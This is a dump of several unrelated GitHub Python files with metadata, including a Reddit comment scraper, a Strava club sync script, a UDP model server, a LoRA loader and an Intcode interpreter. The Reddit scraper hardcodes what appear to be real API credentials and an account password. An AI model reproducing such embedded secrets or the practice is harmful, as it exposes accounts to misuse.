dtype=dtype)\n _set_use_chain_flat(True)\n", "repo_name": "metaopt/torchopt", "sub_path": "tests/test_schedule.py", "file_name": "test_schedule.py", "file_ext": "py", "file_size_in_byte": 4371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 440, "dataset": "github-code", "pt": "86", "api": [{"api_name": "torchopt.schedule.exponential_decay", "line_number": 31, "usage_type": "call"}, {"api_name": "torchopt.schedule", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.floor", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 49, "usage_type": "call"}, {"api_name": "helpers.parametrize", "line_number": 15, "usage_type": "call"}, {"api_name": "torchopt.schedule.linear_schedule", "line_number": 59, "usage_type": "call"}, {"api_name": "torchopt.schedule", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.allclose", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.dtype", "line_number": 87, "usage_type": "attribute"}, {"api_name": "typing.Callable", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.optim", "line_number": 90, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 90, "usage_type": "name"}, {"api_name": "torchopt.alias.utils._set_use_chain_flat", "line_number": 95, "usage_type": "call"}, {"api_name": "helpers.get_models", "line_number": 97, "usage_type": "call"}, {"api_name": "functorch.make_functional_with_buffers", "line_number": 101, "usage_type": "call"}, {"api_name": "torchopt.schedule.linear_schedule", "line_number": 103, "usage_type": "call"}, {"api_name": "torchopt.schedule", "line_number": 103, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.LinearLR", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 119, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 130, "usage_type": "name"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 131, "usage_type": "name"}, {"api_name": "torch.autograd.grad", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 133, "usage_type": "attribute"}, {"api_name": "torchopt.apply_updates", "line_number": 135, "usage_type": "call"}, {"api_name": "helpers.assert_model_all_close", "line_number": 142, "usage_type": "call"}, {"api_name": "torchopt.alias.utils._set_use_chain_flat", "line_number": 143, "usage_type": "call"}, {"api_name": "helpers.parametrize", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.float64", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch.float32", "line_number": 72, "usage_type": "attribute"}, {"api_name": "helpers.NUM_UPDATES", "line_number": 74, "usage_type": "attribute"}, {"api_name": "torchopt.sgd", "line_number": 76, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 76, "usage_type": "attribute"}, {"api_name": "torchopt.adam", "line_number": 77, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 77, "usage_type": "attribute"}, {"api_name": "torchopt.adamw", "line_number": 78, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 78, "usage_type": "attribute"}, {"api_name": "torchopt.adagrad", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torchopt.rmsprop", "line_number": 80, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 80, "usage_type": "attribute"}]} +{"seq_id": "24347200314", "text": "import csv\nimport praw\nimport json\n\n# Credentials to access the Reddit API\nreddit = praw.Reddit(client_id='vgr0He3IMlSqVA',\n client_secret='h0WAu-6F6cQsx3Ku0DcC9gtld24',\n user_agent='by /u/ExtractAccount',\n username='ExtractAccount',\n password='reddit12345')\n\n# Extract only 25 post from the front page\ntopPosts = []\nfor submission in reddit.front.hot(limit=25):\n topPosts.append(submission)\n\n# Lists for comments and information about them\ndonaldComments = []\nauthorList = []\ncomment_ranking = []\n\n# Extract all comments from the front page submissions\nfor sub in topPosts:\n submission = reddit.submission(id=sub)\n submission.comments.replace_more(limit=0)\n for comment in submission.comments.list():\n strip_comment = comment.body.replace(\"\\n\\n\",\" \")\n strip_comment = strip_comment.replace(\"\\n\", \" \")\n if ' Donald ' in comment.body:\n if 'Glover' not in comment.body:\n try:\n authorList.append(comment.author.name)\n except AttributeError:\n authorList.append(\"N/A\")\n donaldComments.append(strip_comment)\n comment_ranking.append(comment.score)\n elif ' donald ' in comment.body:\n if 'Glover' not in comment.body:\n try:\n authorList.append(comment.author.name)\n except AttributeError:\n authorList.append(\"N/A\")\n donaldComments.append(strip_comment)\n comment_ranking.append(comment.score)\n elif 'Trump' in comment.body:\n try:\n authorList.append(comment.author.name)\n except AttributeError:\n authorList.append(\"N/A\")\n donaldComments.append(strip_comment)\n comment_ranking.append(comment.score)\n elif 'trump' in comment.body:\n try:\n authorList.append(comment.author.name)\n except AttributeError:\n authorList.append(\"N/A\")\n authorList.append(comment.author.name)\n donaldComments.append(strip_comment)\n comment_ranking.append(comment.score)\n\n# A list of indexes\nindex_list = []\nfor i in range(0,len(comment_ranking)):\n index_list.append(i)\n\n# Sort by ranking of each comment and allow the list of indexes to be changed accordingly\n# to the rankings\ndef bubble_sort(items):\n for i in range(len(items)):\n for j in range(len(items)-1-i):\n if items[j] < items[j+1]:\n items[j], items[j+1] = items[j+1], items[j]\n index_list[j], index_list[j+1] = index_list[j+1], index_list[j]\n\nbubble_sort(comment_ranking)\n\n# Creates the JS comment file so the browser can present the comments\nwith open('../js/randomTrumpText.js','w+') as myfile:\n # Write a list for the comments\n myfile.write('text_list = [\\n')\n for item in donaldComments:\n holder = json.dumps(item)\n myfile.write(' ' + holder + ',\\n')\n myfile.write(' ];\\n\\n')\n # Write a list for the authors of each comment\n myfile.write('name_list = [\\n')\n for name in authorList:\n holder = json.dumps(name)\n myfile.write(' ' + holder + ',\\n')\n myfile.write(' ];\\n\\n')\n # Write the indexes of the highest rated comments\n myfile.write('rank_list = [\\n')\n for i in range(0,5):\n myfile.write(' ' + str(index_list[i]) + ',\\n')\n myfile.write(' ];\\n\\n')\n myfile.write('var amount = text_list.length;\\n')\n myfile.write('$(\\\"#numberofComments\\\").text(amount + \" Comments\");\\n\\n')\n for i in range(0,5):\n myfile.write('$(\"#comment' + str(i+1) + '\").text(text_list[rank_list[' + str(i) + ']]);\\n')\n myfile.write('\\n')\n for i in range(0,5):\n myfile.write('$(\"#author' + str(i+1) + '\").text(\"- /u/\" + name_list[rank_list[' + str(i) + ']]);\\n')\n myfile.write('\\n')\n myfile.write('var counter = 0\\n\\n')\n myfile.write('function replaceText(){\\n')\n myfile.write(' text = text_list[counter];\\n')\n myfile.write(' if(text.length > 80){\\n')\n myfile.write('')\n myfile.write(' trump_array = [\"Trump\",\"trump\",\"Donald\",\"donald\"];\\n')\n myfile.write(' for(var i=0; i < trump_array.length; i++){\\n')\n myfile.write(' index = text.indexOf(trump_array[i]);\\n')\n myfile.write(' if(index > -1){\\n')\n myfile.write(' if(index > 200){\\n')\n myfile.write(' text = text.substring(index - 200, index) + text.substring(index,index+206);\\n')\n myfile.write(' text = \"... \" + text + \" ...\";\\n')\n myfile.write(' }\\n')\n myfile.write(' else{\\n')\n myfile.write(' diff = 200 - index;\\n')\n myfile.write(' text = text.substring(0, index) + text.substring(index, index+206 + diff);\\n')\n myfile.write(' text = text + \" ...\";\\n')\n myfile.write(' }\\n')\n myfile.write(' }\\n')\n myfile.write(' }\\n')\n myfile.write(' }\\n')\n myfile.write(' $(\"#comment\").text(text + \" -/u/\" + name_list[counter]);\\n')\n myfile.write(' counter += 1;\\n')\n myfile.write(' if((counter % amount) == 0){\\n')\n myfile.write(' counter = 0;\\n')\n myfile.write(' }\\n')\n myfile.write('}\\n\\n')\n myfile.write('function reload(){\\n')\n myfile.write(' location.reload();\\n')\n myfile.write('}\\n\\n')\n myfile.write('replaceText();\\n')\n myfile.write('setInterval(replaceText,10000);\\n')\n myfile.write('setInterval(replaceText,600000);')\n", "repo_name": "jcisneros21/TopRedditWords", "sub_path": "Python/topComments.py", "file_name": "topComments.py", "file_ext": "py", "file_size_in_byte": 5217, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "praw.Reddit", "line_number": 6, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 82, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "2529099949", "text": "from models.ClubMembers import Club, Athlete\nfrom base import Session, engine, Base\nfrom StravaScraper import StravaScraper\nfrom env import CLUB_IDS, STRAVA_WEB_USER, STRAVA_WEB_PWD, WEEK_OFFSET_RANGE\n\nBase.metadata.create_all(engine)\nsession = Session()\n\n\ndef sync_club_members():\n print(\"syncing club members\")\n\n scraper = StravaScraper(STRAVA_WEB_USER, STRAVA_WEB_PWD)\n scraper.login()\n\n for club_id in CLUB_IDS:\n club = session.query(Club).filter(Club.id == club_id).first()\n if not club:\n club = Club(club_id)\n session.add(club)\n\n for week_offset in range(0, WEEK_OFFSET_RANGE):\n athletes = scraper.get_club_leaderboard(club_id, week_offset=week_offset)\n update_athletes(club, athletes)\n\n session.commit()\n session.close()\n\n\ndef update_athletes(club, athletes):\n for a in athletes:\n athlete = session.query(Athlete).filter(Athlete.id == a[\"athlete_id\"]).first()\n\n if not athlete:\n athlete = Athlete(a[\"athlete_id\"], a[\"athlete_firstname\"], a[\"athlete_lastname\"])\n session.add(athlete)\n else:\n athlete.firstname = a[\"athlete_firstname\"]\n athlete.lastname = a[\"athlete_lastname\"]\n\n if athlete not in club.athletes:\n club.athletes.append(athlete)\n\n\nif __name__ == '__main__':\n sync_club_members()\n", "repo_name": "antipodos/xcentis-run", "sub_path": "sync_club_members.py", "file_name": "sync_club_members.py", "file_ext": "py", "file_size_in_byte": 1371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "base.Base.metadata.create_all", "line_number": 6, "usage_type": "call"}, {"api_name": "base.engine", "line_number": 6, "usage_type": "argument"}, {"api_name": "base.Base.metadata", "line_number": 6, "usage_type": "attribute"}, {"api_name": "base.Base", "line_number": 6, "usage_type": "name"}, {"api_name": "base.Session", "line_number": 7, "usage_type": "call"}, {"api_name": "StravaScraper.StravaScraper", "line_number": 13, "usage_type": "call"}, {"api_name": "env.STRAVA_WEB_USER", "line_number": 13, "usage_type": "argument"}, {"api_name": "env.STRAVA_WEB_PWD", "line_number": 13, "usage_type": "argument"}, {"api_name": "env.CLUB_IDS", "line_number": 16, "usage_type": "name"}, {"api_name": "models.ClubMembers.Club", "line_number": 17, "usage_type": "argument"}, {"api_name": "models.ClubMembers.Club.id", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.ClubMembers.Club", "line_number": 19, "usage_type": "call"}, {"api_name": "env.WEEK_OFFSET_RANGE", "line_number": 22, "usage_type": "argument"}, {"api_name": "models.ClubMembers.Athlete", "line_number": 32, "usage_type": "argument"}, {"api_name": "models.ClubMembers.Athlete.id", "line_number": 32, "usage_type": "attribute"}, {"api_name": "models.ClubMembers.Athlete", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "2750997993", "text": "\"\"\"\n [ModelConnectionServer.py]\n Program that hosts a UDP server to host the models.\n\"\"\"\n\nimport socket\nimport socketserver\nimport threading\nimport time\nfrom typing import Tuple\n\nimport numpy\nimport tensorflow\n\nfrom scripts import Log, Constants, Warnings, Parameters, General, InputConstraints\nfrom scripts.General import time_ms, dict_deepcopy\nfrom scripts.frontend.logic import SensorListener\n\n\nclass ThreadedPredictions(threading.Thread):\n def __init__(self, model, to_predict):\n threading.Thread.__init__(self)\n # Prediction variables\n self.model = model\n self.to_predict = to_predict\n\n # Thread variables\n self.result = None\n self.done = False\n self.start()\n\n def run(self) -> None:\n self.result = General.constraint_number_value(\n self.model(self.to_predict)[0][0].numpy(),\n Constants.MODEL_MIN_VAL, Constants.MODEL_MAX_VAL)\n self.done = True\n\n\nclass ModelServer(socketserver.UDPServer):\n\n def __init__(self, server_address=(Constants.MODEL_SERVER_HOST, Constants.MODEL_SERVER_PORT)):\n socketserver.UDPServer.__init__(self, server_address=server_address,\n RequestHandlerClass=socketserver.DatagramRequestHandler)\n self.request_queue_size = 1 # Max queue size for requests\n\n # Server thread variables\n self._running = False\n self._serve_thread = None\n\n # Model logic variables\n self._models = []\n self._sensor_listener = None\n self._prediction_time = None\n self._progress_bar = None\n Log.info(\"Created a Model Server Request Handler.\")\n\n # Server running methods\n def serve_forever(self, poll_interval: float = ...) -> None:\n self._running = True\n self._serve_thread = threading.Thread(target=super().serve_forever)\n self._serve_thread.setName(\"Server Model Thread\")\n self._serve_thread.start()\n\n def shutdown(self) -> None:\n self._running = False\n super().shutdown()\n\n def is_running(self):\n return self._running\n\n # Method logic methods\n def zero_sensors(self):\n assert self._sensor_listener is not None\n self._sensor_listener.zero_sensor_readings()\n\n def connect_model(self, models_dir_path, progress_bar):\n \"\"\"\n Loads the models and starts the server\n :param model_id:\n :return:\n \"\"\"\n # Setting the progress bar\n self._progress_bar = progress_bar\n\n # Starts the sensor reader\n progress_bar.add_count(1)\n progress_bar.set_metric_text(\" Server & Hand Controller. Status: Starting the sensor listener...\")\n\n try:\n self._sensor_listener = SensorListener.SensorReadingsListener()\n self._sensor_listener.start_running()\n self._sensor_listener.start_reading()\n self._sensor_listener.start()\n except:\n self.sensor_listener = None\n InputConstraints.warn(\n \"Warning, was not able to establish communications with COM3 port.\\n\" +\n \"Please ensure that the sensor reading device is connected.\")\n return False\n\n Log.info(\"Connecting to a model.\")\n\n progress_bar.add_count(1)\n progress_bar.set_metric_text(\" Server. Status: Connecting client to Unity...\")\n\n # Loads in the models\n progress_bar.set_metric_text(\" Server. Status: Loading the limb models...\")\n\n self._models = []\n for finger_index in range(0, Constants.NUM_FINGERS):\n self._models.append([])\n for limb_index in range(0, Constants.NUM_LIMBS_PER_FINGER):\n self._models[finger_index].append(tensorflow.keras.models.load_model(\n models_dir_path + \"f-\" + str(finger_index) + \"_l-\" + str(limb_index) + \".mod\",\n custom_objects=None, compile=True, options=None\n ))\n progress_bar.add_count(1)\n\n # Running the server\n progress_bar.add_count(1)\n progress_bar.set_metric_text(\" Server & Hand Controller. Status: Running...\")\n return True\n\n def disconnect_model(self):\n \"\"\"\n Disconnects and stops the server.\n :return:\n \"\"\"\n\n # Stops the sensor listener\n self._sensor_listener.stop_reading()\n self._sensor_listener.stop_running()\n self._sensor_listener = None\n\n # Stops the server\n Log.info(\"Disconnecting from a model.\")\n return True\n\n # finish_request handles the request (runs the inputs by the model)\n def finish_request(self, request: bytes, client_address: Tuple[str, int]) -> None:\n\n if (self._sensor_listener is None):\n Log.error(\"'self._sensor_listener' is 'None' when executing 'finish_request'.\")\n\n # Obtains limb data from the C# Unity script\n # IMPORTANT: Convention assumes the format \"angl1 vel1 angl2 vel2 ... angl15 vel15\"\n string_limb_data = request[0].decode().split(\" \")\n limb_data = []\n for i in range(0, len(string_limb_data)):\n limb_data.append(\n General.constraint_number_value(float(string_limb_data[i]),\n Constants.MODEL_MIN_VAL, Constants.MODEL_MAX_VAL)\n )\n # if i % 2 == 1:\n # # TODO, this is currently multiplying the velocity by the FPS, why?\n # limb_data[i] = limb_data[i] * FRAMES_PER_SECOND\n\n # Obtains the sensors data\n current_sensor_data = self._sensor_listener.get_readings_frame() # Retrieves the sensors dictionary\n sensors_data = []\n for k in self._sensor_listener.get_key_list():\n sensors_data.append(\n General.constraint_number_value(\n current_sensor_data[k], Constants.MODEL_MIN_VAL, Constants.MODEL_MAX_VAL)\n )\n\n # Creates the features list\n features = numpy.array(limb_data + sensors_data)\n\n # Computes the velocities that the virtual hand limbs should acquire # TODO, multithread the prediction\n # threaded_predictions = []\n next_velocities = []\n for finger_index in range(0, Constants.NUM_FINGERS):\n # threaded_predictions.append([])\n for limb_index in range(0, Constants.NUM_LIMBS_PER_FINGER):\n # threaded_predictions[finger_index].append([])\n\n # Prediction\n to_predict = features.reshape(1, Constants.NUM_FEATURES)\n # threaded_predictions[finger_index][limb_index] = ThreadedPredictions(\n # self._models[finger_index][limb_index], to_predict)\n\n next_velocities.append(General.constraint_number_value(\n self._models[finger_index][limb_index](to_predict)[0][0].numpy(),\n Constants.MODEL_MIN_VAL, Constants.MODEL_MAX_VAL))\n\n # # Wait (and polls) until all threaded prediction tasks are complete\n # is_done = False\n # while is_done is False:\n # is_done = True\n # for finger_index in range(0, Constants.NUM_FINGERS):\n # for limb_index in range(0, Constants.NUM_LIMBS_PER_FINGER):\n # is_done &= threaded_predictions[finger_index][limb_index].done\n #\n # # Adds the velocity data\n # for finger_index in range(0, Constants.NUM_FINGERS):\n # for limb_index in range(0, Constants.NUM_LIMBS_PER_FINGER):\n # next_velocities.append(threaded_predictions[finger_index][limb_index].result)\n\n # Prepared the velocities to send to the unity script\n string_velocities = \"\"\n for i in range(0, Constants.NUM_LIMBS_PER_FINGER * Constants.NUM_FINGERS):\n string_velocities += str(next_velocities[i]) + \" \"\n string_velocities = string_velocities.rstrip(\" \")\n\n super().finish_request(request=request, client_address=client_address)\n\n # Sends the torques to the unity script\n # Returns the value to the client\n client_request_socket, client_request_address = self.get_request()[0][1], self.get_request()[1]\n client_request_socket.sendto(string_velocities.encode(), client_request_address)\n\n # Displays the amount of time it has taken to predict to the progress bar\n if self._progress_bar is not None:\n if self._prediction_time is not None:\n self._progress_bar.set_metric_text(\n \" Server & Hand Controller. Status: Running...\"\n \" Time since last prediction: \" + str(General.time_ms() - self._prediction_time) + \" ms\")\n self._prediction_time = General.time_ms()\n", "repo_name": "MichaelLapshin/Virtual-Hand-Application", "sub_path": "scripts/frontend/Logic/ModelConnectionServer.py", "file_name": "ModelConnectionServer.py", "file_ext": "py", "file_size_in_byte": 8743, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "threading.Thread", "line_number": 20, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 22, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 22, "usage_type": "attribute"}, {"api_name": "scripts.General.constraint_number_value", "line_number": 33, "usage_type": "call"}, {"api_name": "scripts.General", "line_number": 33, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MIN_VAL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 35, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MAX_VAL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "socketserver.UDPServer", "line_number": 39, "usage_type": "attribute"}, {"api_name": "scripts.Constants.MODEL_SERVER_HOST", "line_number": 41, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 41, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_SERVER_PORT", "line_number": 41, "usage_type": "attribute"}, {"api_name": "socketserver.UDPServer.__init__", "line_number": 42, "usage_type": "call"}, {"api_name": "socketserver.UDPServer", "line_number": 42, "usage_type": "attribute"}, {"api_name": "socketserver.DatagramRequestHandler", "line_number": 43, "usage_type": "attribute"}, {"api_name": "scripts.Log.info", "line_number": 55, "usage_type": "call"}, {"api_name": "scripts.Log", "line_number": 55, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 60, "usage_type": "call"}, {"api_name": "scripts.frontend.logic.SensorListener.SensorReadingsListener", "line_number": 90, "usage_type": "call"}, {"api_name": "scripts.frontend.logic.SensorListener", "line_number": 90, "usage_type": "name"}, {"api_name": "scripts.InputConstraints.warn", "line_number": 96, "usage_type": "call"}, {"api_name": "scripts.InputConstraints", "line_number": 96, "usage_type": "name"}, {"api_name": "scripts.Log.info", "line_number": 101, "usage_type": "call"}, {"api_name": "scripts.Log", "line_number": 101, "usage_type": "name"}, {"api_name": "scripts.Constants.NUM_FINGERS", "line_number": 110, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 110, "usage_type": "name"}, {"api_name": "scripts.Constants.NUM_LIMBS_PER_FINGER", "line_number": 112, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 112, "usage_type": "name"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 113, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 113, "usage_type": "attribute"}, {"api_name": "scripts.Log.info", "line_number": 136, "usage_type": "call"}, {"api_name": "scripts.Log", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 140, "usage_type": "name"}, {"api_name": "scripts.Log.error", "line_number": 143, "usage_type": "call"}, {"api_name": "scripts.Log", "line_number": 143, "usage_type": "name"}, {"api_name": "scripts.General.constraint_number_value", "line_number": 151, "usage_type": "call"}, {"api_name": "scripts.General", "line_number": 151, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MIN_VAL", "line_number": 152, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 152, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MAX_VAL", "line_number": 152, "usage_type": "attribute"}, {"api_name": "scripts.General.constraint_number_value", "line_number": 163, "usage_type": "call"}, {"api_name": "scripts.General", "line_number": 163, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MIN_VAL", "line_number": 164, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 164, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MAX_VAL", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 168, "usage_type": "call"}, {"api_name": "scripts.Constants.NUM_FINGERS", "line_number": 173, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 173, "usage_type": "name"}, {"api_name": "scripts.Constants.NUM_LIMBS_PER_FINGER", "line_number": 175, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 175, "usage_type": "name"}, {"api_name": "scripts.Constants.NUM_FEATURES", "line_number": 179, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 179, "usage_type": "name"}, {"api_name": "scripts.General.constraint_number_value", "line_number": 183, "usage_type": "call"}, {"api_name": "scripts.General", "line_number": 183, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MIN_VAL", "line_number": 185, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 185, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MAX_VAL", "line_number": 185, "usage_type": "attribute"}, {"api_name": "scripts.Constants.NUM_LIMBS_PER_FINGER", "line_number": 202, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 202, "usage_type": "name"}, {"api_name": "scripts.Constants.NUM_FINGERS", "line_number": 202, "usage_type": "attribute"}, {"api_name": "scripts.General.time_ms", "line_number": 218, "usage_type": "call"}, {"api_name": "scripts.General", "line_number": 218, "usage_type": "name"}, {"api_name": "scripts.General.time_ms", "line_number": 219, "usage_type": "call"}, {"api_name": "scripts.General", "line_number": 219, "usage_type": "name"}]} +{"seq_id": "23561779494", "text": "from diffusers import DiffusionPipeline\nfrom diffusers.loaders import LoraLoaderMixin\nimport torch\n\n\ndef load_lora_weights(unet, text_encoder, input_dir):\n lora_state_dict, network_alphas = LoraLoaderMixin.lora_state_dict(input_dir)\n LoraLoaderMixin.load_lora_into_unet(\n lora_state_dict, network_alphas=network_alphas, unet=unet\n )\n LoraLoaderMixin.load_lora_into_text_encoder(\n lora_state_dict, network_alphas=network_alphas, text_encoder=text_encoder\n )\n return unet, text_encoder\n\n\ndef get_pipeline(model_dir, lora_weights_dir=None):\n pipeline = DiffusionPipeline.from_pretrained(model_dir, torch_dtype=torch.float16)\n if lora_weights_dir:\n unet = pipeline.unet\n text_encoder = pipeline.text_encoder\n print(f\"Loading LoRA weights from {lora_weights_dir}\")\n unet, text_encoder = load_lora_weights(unet, text_encoder, lora_weights_dir)\n pipeline.unet = unet\n pipeline.text_encoder = text_encoder\n return pipeline\n", "repo_name": "ray-project/ray", "sub_path": "doc/source/templates/05_dreambooth_finetuning/dreambooth/generate_utils.py", "file_name": "generate_utils.py", "file_ext": "py", "file_size_in_byte": 998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 28715, "dataset": "github-code", "pt": "86", "api": [{"api_name": "diffusers.loaders.LoraLoaderMixin.lora_state_dict", "line_number": 7, "usage_type": "call"}, {"api_name": "diffusers.loaders.LoraLoaderMixin", "line_number": 7, "usage_type": "name"}, {"api_name": "diffusers.loaders.LoraLoaderMixin.load_lora_into_unet", "line_number": 8, "usage_type": "call"}, {"api_name": "diffusers.loaders.LoraLoaderMixin", "line_number": 8, "usage_type": "name"}, {"api_name": "diffusers.loaders.LoraLoaderMixin.load_lora_into_text_encoder", "line_number": 11, "usage_type": "call"}, {"api_name": "diffusers.loaders.LoraLoaderMixin", "line_number": 11, "usage_type": "name"}, {"api_name": "diffusers.DiffusionPipeline.from_pretrained", "line_number": 18, "usage_type": "call"}, {"api_name": "diffusers.DiffusionPipeline", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.float16", "line_number": 18, "usage_type": "attribute"}]} +{"seq_id": "11217990936", "text": "import copy\nimport json\n\n\nclass Memory(object):\n def __init__(self, code):\n self._memory = code\n self._memory.extend([0] * len(code))\n\n def write(self, index, element):\n self.extend_if_needed(index)\n self._memory[index] = element\n\n def read(self, index):\n self.extend_if_needed(index)\n return self._memory[index]\n\n def extend_if_needed(self, index):\n while index > len(self._memory):\n new_length = int(len(self._memory) * 1.5)\n self._memory.extend([0] * new_length)\n\n def read_all(self):\n return copy.deepcopy(self._memory)\n\n def get_length(self):\n return len(self._memory)\n\n\nclass Intcode(object):\n \"\"\"The Intcode computer that is used in The Advent Of Code\n\n Attributes:\n program: Program that is being run on the computer.\n pr_input: An array with the initial input to the program.\n index: Current value of the instruction pointer\n \"\"\"\n\n def __init__(self, program, pr_input):\n self.memory = Memory(program)\n self._pr_input = copy.deepcopy(pr_input)\n self.index = 0\n self._pr_output = []\n self.info = Intcode.get_action_info()\n self.relative_base = 0\n\n @staticmethod\n def get_action_info():\n with open('action_data.json', 'r') as data_file:\n data = data_file.read()\n\n return json.loads(data)\n\n @staticmethod\n def _prepend_modes(modes, num_ops):\n \"\"\"Append omitted zeroes to the modes\"\"\"\n return modes + ((num_ops - len(modes)) * '0')\n\n def add_input(self, value):\n self._pr_input.append(value)\n\n def do_operation(self, data):\n self.index += 1\n\n memory = self.memory\n operation = data['operation']\n if operation == '1':\n memory.write(data['result'], data['operand1'] + data['operand2'])\n elif operation == '2':\n memory.write(data['result'], data['operand1'] * data['operand2'])\n elif operation == '3':\n memory.write(data['result'], self._pr_input.pop(0))\n elif operation == '4':\n self._pr_output.append(data['operand1'])\n elif operation == '5':\n if data['operand1'] != 0:\n self.index = data['operand2']\n elif operation == '6':\n if data['operand1'] == 0:\n self.index = data['operand2']\n elif operation == '7':\n if data['operand1'] < data['operand2']:\n memory.write(data['result'], 1)\n else:\n memory.write(data['result'], 0)\n elif operation == '8':\n if data['operand1'] == data['operand2']:\n memory.write(data['result'], 1)\n else:\n memory.write(data['result'], 0)\n elif operation == '9':\n self.relative_base += data['operand1']\n else:\n raise ValueError(\"Invalid action {0}\".format(operation))\n\n def get_operand(self, mode):\n memory = self.memory\n if mode is '0':\n return memory.read(memory.read(self.index))\n elif mode is '1':\n return memory.read(self.index)\n elif mode is '2':\n address = self.relative_base + memory.read(self.index)\n return memory.read(address)\n else:\n raise ValueError(\"Invalid mode {0}\".format(mode))\n\n def get_operation_data(self, action):\n operation = action[-1]\n data = {'operation': operation}\n\n num_ops = self.info[action[-1]]['operands']\n modes = Intcode._prepend_modes(action[:-2][::-1], num_ops + 1)\n for op_count in range(0, num_ops):\n self.index += 1\n data[\"operand{}\".format(op_count + 1)] = self.get_operand(modes[op_count])\n\n if self.info[operation]['result']:\n self.index += 1\n if modes[-1] == '2':\n address= self.relative_base + self.memory.read(self.index)\n data['result'] = address\n else:\n data[\"result\"] = self.get_operand('1')\n\n return data\n\n def run(self):\n memory = self.memory\n\n while self.index < memory.get_length():\n action = str(memory.read(self.index))\n\n if action == '99':\n break\n\n operation = action[-1]\n if operation == '3' and len(self._pr_input) == 0:\n # Freeze program\n break\n\n op_data = self.get_operation_data(action)\n self.do_operation(op_data)\n\n output_so_far = copy.deepcopy(self._pr_output)\n self._pr_output = []\n return output_so_far\n\n\ndef run_program(program, pr_input=None):\n if pr_input is None:\n pr_input = []\n intcode = Intcode(program, pr_input)\n return intcode.run()\n\n", "repo_name": "MilenOrfeev/aoc", "sub_path": "intcode.py", "file_name": "intcode.py", "file_ext": "py", "file_size_in_byte": 4801, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "copy.deepcopy", "line_number": 24, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 41, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 52, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 145, "usage_type": "call"}]} +{"seq_id": "71006031006", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django_pgjson.fields\nfrom django.conf import settings\nimport django.contrib.postgres.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('monitors', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='CertificateMonitor',\n fields=[\n ('created', models.DateTimeField(auto_now_add=True)),\n ('modified', models.DateTimeField(auto_now=True)),\n ('lookup_interval', models.IntegerField()),\n ('next_lookup', models.DateTimeField()),\n ('last_hosts', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=254), blank=True, null=True, size=None)),\n ('certificate_value', 